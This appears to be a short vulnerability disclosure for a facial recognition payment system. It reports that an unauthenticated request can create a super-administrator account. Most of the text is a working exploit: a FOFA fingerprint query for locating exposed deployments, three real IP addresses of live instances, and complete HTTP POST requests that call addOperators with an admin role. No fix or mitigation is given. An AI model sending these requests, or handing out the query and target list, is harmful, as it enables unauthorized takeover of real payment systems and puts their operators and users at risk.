Unauthorized creation of super administrator account exists in Facial Love Cloud Facial Payment System Procedure
official website: http://www.szjocat.com/#

Function point: Add super administrator option for personnel management in the system management center module
FOFA syntax
icon_hash="241050903" && ip!="101.200.146.70"
Instance reproduction1:
http://140.210.211.116:1040/Login.aspx

POST /SystemMng.ashx HTTP/1.1
Host: 140.210.211.116:1040
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://140.210.211.116:1040
Referer: http://140.210.211.116:1040/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
http://140.210.211.116:1200/Login.aspx
POST /SystemMng.ashx HTTP/1.1
Host: 140.210.211.116:1040
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://140.210.211.116:1040/Login.aspx
Referer: http://140.210.211.116:1040/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators http://116.63.182.155:1000/Login.aspx
POST /SystemMng.ashx HTTP/1.1
Host: 116.63.182.155:1000
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://116.63.182.155:1000
Referer: http://116.63.182.155:1000/View/SystemMng/OperatorMng.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators



